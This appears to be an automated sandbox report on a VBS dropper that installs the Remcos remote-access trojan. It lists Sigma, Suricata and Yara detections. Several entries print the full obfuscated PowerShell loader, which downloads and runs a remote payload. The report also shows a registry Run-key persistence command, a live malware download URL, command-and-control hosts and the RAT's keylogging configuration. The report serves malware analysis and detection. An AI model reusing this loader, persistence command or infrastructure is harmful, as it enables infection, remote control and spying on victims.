                • 0x131c3:$s4: +=
                • 0x13247:$s4: +=
                • 0x9a63:$e4: Get-WmiObject
                • 0x9c52:$e4: Get-Process
                • 0x9caa:$e4: Start-Process
                • 0x13ab8:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Potentially Suspicious PowerShell Child Processes
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUn
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUn
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUn
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", ProcessId: 6120, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afskibning
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6940, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", ProcessId: 2740, ProcessName: reg.exe
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Temp\romerret.vbs
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspici
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs", ProcessId: 6120, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1060, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-30T20:15:41.766250+010020365941Malware Command and Control Activity Detected192.168.2.44973845.88.88.339945TCP
                2024-11-30T20:15:44.172506+010020365941Malware Command and Control Activity Detected192.168.2.44973945.88.88.339945TCP
                2024-11-30T20:15:44.281889+010020365941Malware Command and Control Activity Detected192.168.2.44974045.88.88.339945TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-30T20:15:44.356588+010028033043Unknown Traffic192.168.2.449741178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-30T20:15:37.218633+010028032702Potentially Bad Traffic192.168.2.44973792.205.55.123443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgLG14.binAvira URL Cloud: Label: malware
                Source: https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["www.tla-autos.com:9945:1"], "Assigned name": "TelOu62tos", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "TeleAuto8926-8WB4GE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                Source: unknownHTTPS traffic detected: 217.160.0.118:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 92.205.55.123:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.169.145.163:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.3007386911.00000000088DC000.00000004.00000020.00020000.00000000.sdmp
